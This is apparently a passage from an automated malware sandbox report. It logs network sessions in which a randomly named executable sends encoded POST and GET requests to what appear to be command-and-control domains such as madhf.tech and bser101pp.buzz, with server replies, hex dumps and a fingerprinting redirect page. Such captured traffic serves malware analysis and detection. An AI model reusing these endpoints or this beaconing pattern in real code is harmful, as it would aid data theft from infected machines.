                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                        Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.749907103.224.182.242803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:43.545677900 CET649OUTPOST /6ou6/ HTTP/1.1
                                                        Host: www.madhf.tech
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.madhf.tech
                                                        Content-Length: 235
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.madhf.tech/6ou6/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Raw: 48 5a 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 56 6a 48 36 36 33 38 31 75 4a 2f 4e 67 50 45 63 57 32 49 44 79 30 76 50 58 44 78 4b 35 67 65 30 45 4b 2f 36 7a 4d 78 52 75 72 43 39 47 37 68 33 74 46 6a 37 73 68 64 35 49 70 68 50 41 7a 52 51 37 69 2f 4c 66 6b 6b 4c 53 55 4c 4c 2b 78 49 49 50 64 67 6c 41 44 30 74 44 4d 32 53 69 7a 66 6d 33 57 36 43 34 52 4a 66 6a 43 74 4f 4c 4c 6b 47 59 7a 6a 76 74 4a 70 55 79 67 2f 69 52 4f 77 66 32 4d 50 6f 7a 38 50 65 30 6e 66 57 42 35 30 4b 2b 6f 56 2f 4e 52 76 6b 33 58 46 62 4f 65 2f 52 74 6b 56 44 6f 46 6d 73 54 76 76 47 30 79 6d 47 57 6c 57 34 63 44 7a 59 39 67 4c 50 7a 30 3d
                                                        Data Ascii: HZ=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWB50K+oV/NRvk3XFbOe/RtkVDoFmsTvvG0ymGWlW4cDzY9gLPz0=
                                                        Dec 3, 2024 14:42:44.890918970 CET871INHTTP/1.1 200 OK
                                                        date: Tue, 03 Dec 2024 13:42:44 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1733233364.5099805; expires=Fri, 01-Dec-2034 13:42:44 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 576
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                        Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.749915103.224.182.242803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:46.216057062 CET1662OUTPOST /6ou6/ HTTP/1.1
                                                        Host: www.madhf.tech
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.madhf.tech
                                                        Content-Length: 1247
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.madhf.tech/6ou6/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Raw: 48 5a 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 54 37 48 6d 66 72 38 7a 4a 56 2f 4b 67 50 45 41 6d 32 7a 44 79 30 79 50 58 4c 31 4b 35 74 70 30 41 36 2f 37 53 73 78 51 66 72 43 75 6d 37 68 6f 64 46 69 32 4d 68 45 35 4c 52 74 50 45 76 52 51 37 69 2f 4c 5a 41 6b 50 47 41 4c 51 2b 78 4a 4c 50 63 68 75 67 44 49 74 41 38 49 53 6a 48 50 6d 45 4f 36 44 59 42 4a 61 52 61 74 4e 72 4c 69 48 59 7a 4e 76 74 56 32 55 79 73 4a 69 53 53 4b 66 30 4d 50 6f 33 41 57 61 33 72 72 4d 67 34 72 4d 6f 31 33 77 38 4a 49 6d 47 33 73 52 65 71 73 5a 75 73 50 50 49 78 58 6c 45 61 76 66 79 43 6f 64 79 64 79 2b 35 6e 38 4d 39 49 68 4e 46 32 73 74 4a 71 31 6c 53 45 56 75 37 2f 39 6f 48 71 53 57 44 77 73 4a 65 48 4c 75 35 46 4f 36 41 38 31 50 4e 62 32 5a 75 4a 4c 56 43 61 78 74 6d 62 46 4d 6a 33 64 58 46 56 34 78 48 4a 64 66 45 2f 57 71 33 48 6a 45 54 66 45 55 72 71 44 73 44 49 30 75 52 71 61 70 59 35 41 47 49 47 50 33 73 51 4c 34 30 48 52 42 4e 4e [TRUNCATED]
                                                        Data Ascii: HZ=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eT7Hmfr8zJV/KgPEAm2zDy0yPXL1K5tp0A6/7SsxQfrCum7hodFi2MhE5LRtPEvRQ7i/LZAkPGALQ+xJLPchugDItA8ISjHPmEO6DYBJaRatNrLiHYzNvtV2UysJiSSKf0MPo3AWa3rrMg4rMo13w8JImG3sReqsZusPPIxXlEavfyCodydy+5n8M9IhNF2stJq1lSEVu7/9oHqSWDwsJeHLu5FO6A81PNb2ZuJLVCaxtmbFMj3dXFV4xHJdfE/Wq3HjETfEUrqDsDI0uRqapY5AGIGP3sQL40HRBNNsiZ6yhbpBX0Gx7uzC2izWsQWyH2SIHijcJ7ag2967fLnXPilx2oTd1NVCkytqTLiMe4tWrZpu4IcbbLmUNkZCVkFFTPCciEjBEyrcoZvNyfJXbQRJdpq6GzZDSb2fgS9mRp53lnmHxeIyfT2u3ElSUC+A5YUTKlU5H2B+a8UdBUveiuFy9SBXzXLHC/HegROYFkRV3cPmFSL3s2Ih5C8Sovt5+q13RXy/UV1Tmi342PFlwtYEdsj+SM3+RSQTfYDCZYSJ6O6WM6niCRMxV5H7nxQ7wuWWff42sz07xasFH/PCMx4/EejcZawvssAPsiZI1PaTLXyGags8V9sePdHLqmKuJ42Vy7jZWaqUDSJUG+XIKqd9gak5rBgmKqCuTa7ODfdBsty9PKUOtgbVfyBEsMw8v5yJXoJnvQDmi8+sYJYjBmSplcPpAj0kY0HI08OWcNxQFJSthVU0BeYeeKC7vz4wdpYWp99y4A3/zbA4HpH4CmFg/RfYfqCGwMuIX6huOyQkGD+2mE89asrRt7H6hYNiMnhMW/fvHdFc0Jk3C0lPc4sA7iMz2sCAG/LttzBxpc+WwyOhP9ttGJ7wz2ssFIx49ZXxa15I9DvvdgNp5Yk+8dz/lRyI19RpEFDDijgChj3IKKpNziOhq7VUeREt32+W8F4aSAO3t [TRUNCATED]
                                                        Dec 3, 2024 14:42:47.573178053 CET871INHTTP/1.1 200 OK
                                                        date: Tue, 03 Dec 2024 13:42:47 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1733233367.6311852; expires=Fri, 01-Dec-2034 13:42:47 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 576
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                        Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.749922103.224.182.242803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:48.869399071 CET367OUTGET /6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t4Wjx9MdK2LZUtOM2FmXlL5GxHvEoA3gFavIudvI/vR7LkiZUXjXX7Xfe&Z4=CrodyR HTTP/1.1
                                                        Host: www.madhf.tech
                                                        Accept: */*
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Dec 3, 2024 14:42:50.187536001 CET1236INHTTP/1.1 200 OK
                                                        date: Tue, 03 Dec 2024 13:42:49 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1733233369.7680737; expires=Fri, 01-Dec-2034 13:42:49 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-length: 1514
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36 6f 75 36 2f 3f 48 5a 3d 57 65 37 32 6b 32 55 38 52 71 79 48 4e 78 39 63 30 6c 67 72 63 4d 61 6a 50 2b 37 50 79 64 50 6e 43 61 75 30 35 4b 51 4d 55 6a 57 6d 71 37 33 49 7a 75 70 46 64 52 47 64 64 6e 6d 58 43 53 52 64 4d 55 72 6b 47 4b 64 51 30 41 48 59 38 6a 42 49 55 63 2f 74 34 57 6a 78 39 4d 64 4b 32 4c 5a 55 74 4f 4d 32 46 6d 58 6c 4c 35 47 78 48 76 45 6f 41 33 67 46 61 76 49 75 64 76 49 2f 76 52 37 4c 6b 69 5a 55 58 6a 58 58 37 58 66 [TRUNCATED]
                                                        Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t4Wjx9MdK2LZUtOM2FmXlL5GxHvEoA3gFavIudvI/vR7LkiZUXjXX7Xfe&Z4=CrodyR&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="
                                                        Dec 3, 2024 14:42:50.187582016 CET550INData Raw: 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63
                                                        Data Ascii: #ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t4Wjx9MdK2LZUtOM2FmXlL5GxHvEoA3gFavIudvI/vR7LkiZUXjXX7Xfe&Z4=CrodyR


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.749938104.21.58.90803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:55.773456097 CET641OUTPOST /v89f/ HTTP/1.1
                                                        Host: www.bser101pp.buzz
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.bser101pp.buzz
                                                        Content-Length: 215
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.bser101pp.buzz/v89f/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Raw: 48 5a 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 51 61 45 52 37 58 6a 38 69 33 31 67 51 44 61 6a 45 7a 6b 68 38 53 48 68 59 45 59 68 2f 63 66 51 33 41 77 37 34 34 78 48 36 6a 65 7a 67 37 43 63 75 77 30 32 71 52 34 67 54 33 52 4e 6d 57 55 73 57 37 51 55 78 31 5a 45 32 59 6f 35 68 68 33 47 54 33 54 75 55 58 36 67 47 35 66 45 39 71 6d 59 48 7a 74 45 34 56 2b 64 48 34 6f 66 5a 71 69 5a 67 36 6e 7a 6f 44 2f 75 43 71 7a 4f 50 36 51 37 62 42 46 64 75 6b 68 55 4b 2b 64 57 4c 78 56 32 39 58 50 70 30 6e 55 75 6f 50 33 47 71 77 69 76 5a 72 65 78 64 43 76 76 45 72 6b 4a 4d 64 72 41 59 68 4a 77 68 39 50 79 75 55 57 51 61 75 35 53 78 78 76 32 59 51 3d 3d
                                                        Data Ascii: HZ=iTfEV/Gi0JnQQaER7Xj8i31gQDajEzkh8SHhYEYh/cfQ3Aw744xH6jezg7Ccuw02qR4gT3RNmWUsW7QUx1ZE2Yo5hh3GT3TuUX6gG5fE9qmYHztE4V+dH4ofZqiZg6nzoD/uCqzOP6Q7bBFdukhUK+dWLxV29XPp0nUuoP3GqwivZrexdCvvErkJMdrAYhJwh9PyuUWQau5Sxxv2YQ==
                                                        Dec 3, 2024 14:42:56.965662003 CET976INHTTP/1.1 404 Not Found
                                                        Date: Tue, 03 Dec 2024 13:42:56 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2F74XyXSEwvYmpRFhGdnd2ofG2kgmFNS8MJ5VhoVFeSxsJtVoy09Sv7Q%2FspUfjj%2B53wZGUYlJjYu3iVcal0vOVniH1OTX4Lp0qrtK7sr2g6VE6kvcnlRWrJi1h8vDLy4%2BXwXaIs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ec3fb9c5eb243be-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1721&rtt_var=860&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=641&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.749944104.21.58.90803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:58.435972929 CET661OUTPOST /v89f/ HTTP/1.1
                                                        Host: www.bser101pp.buzz
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.bser101pp.buzz
                                                        Content-Length: 235
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.bser101pp.buzz/v89f/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Raw: 48 5a 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 4c 51 30 68 41 37 69 35 78 48 32 44 65 7a 34 4c 44 57 77 41 30 39 71 52 30 53 54 7a 52 4e 6d 57 41 73 57 35 59 55 77 43 4e 48 32 49 6f 37 74 42 33 41 4f 6e 54 75 55 58 36 67 47 35 4c 75 39 75 4b 59 48 44 64 45 71 67 43 63 63 59 6f 63 65 71 69 5a 33 71 6e 33 6f 44 2f 49 43 72 76 67 50 35 6f 37 62 41 31 64 75 51 56 4c 66 4f 64 63 50 78 55 6c 2b 6c 47 53 32 46 4d 41 68 4f 44 77 67 33 6d 4f 63 64 66 54 48 67 6a 44 61 36 63 79 49 66 50 32 50 48 55 46 6a 38 4c 71 6a 32 69 78 46 5a 63 34 38 6a 4f 79 4f 6c 58 37 4d 33 4f 67 4b 38 38 76 57 55 6e 41 34 42 66 77 57 4f 67 3d
                                                        Data Ascii: HZ=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uLQ0hA7i5xH2Dez4LDWwA09qR0STzRNmWAsW5YUwCNH2Io7tB3AOnTuUX6gG5Lu9uKYHDdEqgCccYoceqiZ3qn3oD/ICrvgP5o7bA1duQVLfOdcPxUl+lGS2FMAhODwg3mOcdfTHgjDa6cyIfP2PHUFj8Lqj2ixFZc48jOyOlX7M3OgK88vWUnA4BfwWOg=
                                                        Dec 3, 2024 14:42:59.650861025 CET975INHTTP/1.1 404 Not Found
                                                        Date: Tue, 03 Dec 2024 13:42:59 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwG9GsyzKh8Tcmmhkawf%2FtFCrgXxKWUWRzTYPPIm3wxLM%2Bc8jMYAhgR9b6vtVcqOVkG1D70Y2GcTRKUpYg8gFw9WPNKLbiVNTH4MyllY8gAL2EF9%2F4%2BPEU4VoDq1zBYYCrOnLUo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ec3fbad298d5e74-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=661&delivery_rate=0&cwnd=95&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.749950104.21.58.90803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:43:01.111830950 CET1674OUTPOST /v89f/ HTTP/1.1
                                                        Host: www.bser101pp.buzz
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.bser101pp.buzz
                                                        Content-Length: 1247
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.bser101pp.buzz/v89f/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
